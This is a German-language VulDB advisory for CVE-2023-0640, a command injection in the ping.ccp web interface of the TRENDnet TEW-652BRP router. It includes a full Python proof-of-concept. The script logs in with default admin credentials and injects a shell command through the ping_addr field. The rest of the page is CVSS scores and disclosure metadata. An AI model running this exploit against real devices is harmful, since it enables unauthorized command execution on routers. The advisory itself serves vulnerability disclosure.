TRENDnet TEW-652BRP 3.04b01 Web Interface ping.ccp erweiterte Rechte

CVSS Meta Temp ScoreAktueller Exploitpreis (≈)CTI Interest Score
7.8$0-$5k0.10

Es wurde eine kritische Schwachstelle in TRENDnet TEW-652BRP 3.04b01 ausgemacht. Es betrifft eine unbekannte Funktion der Datei ping.ccp der Komponente Web Interface. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-77 vorgenommen. Es ist nicht genau bekannt, welche Auswirkungen ein erfolgreicher Angriff haben wird.

Die Schwachstelle wurde am 02.02.2023 publik gemacht. Die Verwundbarkeit wird unter CVE-2023-0640 geführt. Es sind sowohl technische Details als auch ein öffentlicher Exploit zur Schwachstelle bekannt. Das MITRE ATT&CK Projekt deklariert die Angriffstechnik als T1202.

Ein öffentlicher Exploit wurde in Python entwickelt. Der Download des Exploits kann von vuldb.com geschehen. Er wird als proof-of-concept gehandelt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'

headers = {'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Origin': 'http://{}'.format(device_web_ip), 
'Connection': 'keep-alive', 
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 
'Upgrade-Insecure-Requests': '1'}

login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
  print('Login wrong, please retry!')
  exit()

params = {
  'ccp_act': 'ping_v4', 
  'nextPage': 'ping_back.htm', 
  'html_response_page': 'ping_back.htm', 
  'html_response_message': 'The+setting+is+saved.', 
  'html_response_return_page': 'ping_test.htm', 
  'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 
  'ping': 'Ping', 
  'deviceList': '', 
  '/friendlyName': ''
  }
method = 'POST'
url = 'http://{}/ping.ccp'.format(device_web_ip)

try:
  r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
  r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except:
  pass

Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.

Produktinfo

Hersteller

Name

Version

Lizenz

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv3info

VulDB Meta Base Score: 8.1
VulDB Meta Temp Score: 7.8

VulDB Base Score: 7.2
VulDB Temp Score: 6.5
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

NVD Base Score: 9.8
NVD Vector: 🔍

CNA Base Score: 7.2
CNA Vector (VulDB): 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VektorKomplexitätAuthentisierungVertraulichkeitIntegritätVerfügbarkeit
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍

NVD Base Score: 🔍

Exploitinginfo

Klasse: Erweiterte Rechte
CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

Lokal: Nein
Remote: Ja

Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Programmiersprache: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍

0-Dayfreischaltenfreischaltenfreischaltenfreischalten
Heutefreischaltenfreischaltenfreischaltenfreischalten

Threat Intelligenceinfo

Interesse: 🔍
Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍

Gegenmassnahmeninfo

Empfehlung: keine Massnahme bekannt
Status: 🔍

0-Day Time: 🔍

Timelineinfo

02.02.2023 🔍
02.02.2023 +0 Tage 🔍
02.02.2023 +0 Tage 🔍
01.03.2023 +27 Tage 🔍

Quelleninfo

Status: Nicht definiert

CVE: CVE-2023-0640 (🔍)
scip Labs: https://www.scip.ch/?labs.20161013

Eintraginfo

Erstellt: 02.02.2023 09:18
Aktualisierung: 01.03.2023 17:07
Anpassungen: 02.02.2023 09:18 (39), 02.02.2023 09:19 (2), 01.03.2023 17:01 (2), 01.03.2023 17:07 (28)
Komplett: 🔍
Einsender: leetsun

Submitinfo

Akzeptiert

  • Submit #77217: Command injection on TRENDnet router TEW-652BRP (von leetsun)

Diskussion

Bisher keine Kommentare. Sprachen: de + en.

Bitte loggen Sie sich ein, um kommentieren zu können.

Do you want to use VulDB in your project?

Use the official API to access entries easily!